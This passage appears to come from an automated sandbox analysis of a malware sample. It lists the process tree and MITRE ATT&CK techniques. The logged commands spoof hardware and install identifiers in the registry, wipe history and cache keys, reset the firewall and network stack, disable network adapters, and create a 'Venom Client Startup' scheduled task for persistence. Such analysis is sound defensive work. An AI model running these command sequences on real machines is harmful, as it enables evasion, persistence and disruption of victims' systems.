    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4856
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2141726582204032114525439189042368124825128391000316988 /f
      4⤵
      Modifies registry class
      PID:1284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1312
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 21417265822040321145254391890423681248251283910003 /f
      4⤵
      Modifies registry key
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2132
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 214172658220403211452543918904236812482512839100031698810246 /f
      4⤵
      PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2424
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 214172658220403211452543918904236812482512839100031698810246 /f
      4⤵
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4844
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 214172658220403211452543918904236812482512839 /f
      4⤵
      Modifies Internet Explorer settings
      PID:1576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:4840
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 214172658220403 /f
      4⤵
      Modifies registry key
      PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:756
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 214172658220403 /f
      4⤵
      PID:5000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:484
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 214172658220403 /f
      4⤵
      PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:1424
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 214172658220403 /f
      4⤵
      Modifies registry key
      PID:2560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:3920
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 214172658220403211452543918904236812482512839100031698810246 /f
      4⤵
      PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.%random%.%random%-%random%_%random%%random% /f
    3⤵
    PID:4408
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductPfn /t REG_SZ /d Microsoft.Windows.21417.26582-20403_2114525439 /f
      4⤵
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
    3⤵
    PID:2276
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\ProductOptions /v OSProductContentId /t REG_SZ /d {21417-26582-20403-21145} /f
      4⤵
      Modifies registry key
      PID:3556
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
    3⤵
    PID:444
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Direct3D /v WHQLClass /f
      4⤵
      Modifies registry key
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
    3⤵
    PID:2268
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User" "Shell" "Folders /v History /f
      4⤵
      Modifies registry key
      PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
    3⤵
    PID:4848
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Internet" "Settings\5.0\Cache /f
      4⤵
      Modifies registry key
      PID:4380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh winsock reset
    3⤵
    PID:488
  - - C:\Windows\system32\netsh.exe
      netsh winsock reset
      4⤵
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh int ip reset
    3⤵
    PID:4772
  - - C:\Windows\system32\netsh.exe
      netsh int ip reset
      4⤵
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall reset
    3⤵
    PID:4624
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall reset
      4⤵
      PID:2752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /flushdns
    3⤵
    PID:1296
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /flushdns
      4⤵
      Gathers network information
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /release
    3⤵
    PID:1796
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /release
      4⤵
      Gathers network information
      PID:1588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ipconfig /renew
    3⤵
    PID:1972
  - - C:\Windows\system32\ipconfig.exe
      ipconfig /renew
      4⤵
      Gathers network information
      PID:3000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c arp -d
    3⤵
    PID:4044
  - - C:\Windows\system32\ARP.EXE
      arp -d
      4⤵
      PID:2052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh interface ip delete arpcache
    3⤵
    PID:3288
  - - C:\Windows\system32\netsh.exe
      netsh interface ip delete arpcache
      4⤵
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start C:\Windows\IME\networkclean.exe
    3⤵
    PID:2596
  - - C:\Windows\IME\networkclean.exe
      C:\Windows\IME\networkclean.exe
      4⤵
      Executes dropped EXE
      Checks computer location settings
      PID:3848
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4CC1.tmp\4CC2.tmp\4CC3.bat C:\Windows\IME\networkclean.exe"
        5⤵
        
        PID:2988
      - C:\Windows\system32\netsh.exe
        
        NETSH WINSOCK RESET
        6⤵
        
        PID:4816
      - C:\Windows\system32\netsh.exe
        
        NETSH INT IP RESET
        6⤵
        
        PID:2684
      - C:\Windows\system32\netsh.exe
        
        NETSH INTERFACE IPV4 RESET
        6⤵
        
        PID:3896
      - C:\Windows\system32\netsh.exe
        
        NETSH INTERFACE IPV6 RESET
        6⤵
        
        PID:4344
      - C:\Windows\system32\netsh.exe
        
        NETSH INTERFACE TCP RESET
        6⤵
        
        PID:60
      - C:\Windows\system32\netsh.exe
        
        NETSH INT RESET ALL
        6⤵
        
        PID:4348
      - C:\Windows\system32\ipconfig.exe
        
        IPCONFIG /RELEASE
        6⤵
        Gathers network information
        
        PID:4532
      - C:\Windows\system32\ipconfig.exe
        
        IPCONFIG /RELEASE
        6⤵
        Gathers network information
        
        PID:3176
      - C:\Windows\system32\ipconfig.exe
        
        IPCONFIG /FLUSHDNS
        6⤵
        Gathers network information
        
        PID:4148
      - C:\Windows\system32\nbtstat.exe
        
        NBTSTAT -R
        6⤵
        
        PID:4360
      - C:\Windows\system32\nbtstat.exe
        
        NBTSTAT -RR
        6⤵
        
        PID:2960
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC PATH WIN32_NETWORKADAPTER WHERE PHYSICALADAPTER=TRUE CALL DISABLE
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c %systemdrive%\Windows\IME\adapters.exe
    3⤵
    PID:4960
- C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe
  "C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1288
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Venom Client Startup" /sc ONLOGON /tr "C:\Windows\SysWOW64\Images.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:1336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ムゐﾚズﾒ丂ﾶ尺ﾌﾑりのﾒ乇の√.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Windows\SysWOW64\chcp.com
      chcp 65001
      4⤵
      PID:3920
  - - C:\Windows\SysWOW64\PING.EXE
      ping -\Common 10 localhost
      4⤵
      Runs ping.exe
      PID:3612
- C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe
  "C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4644

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

Persistence

Modify Existing Service

T1031

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Remote System Discovery

T1018

System Information Discovery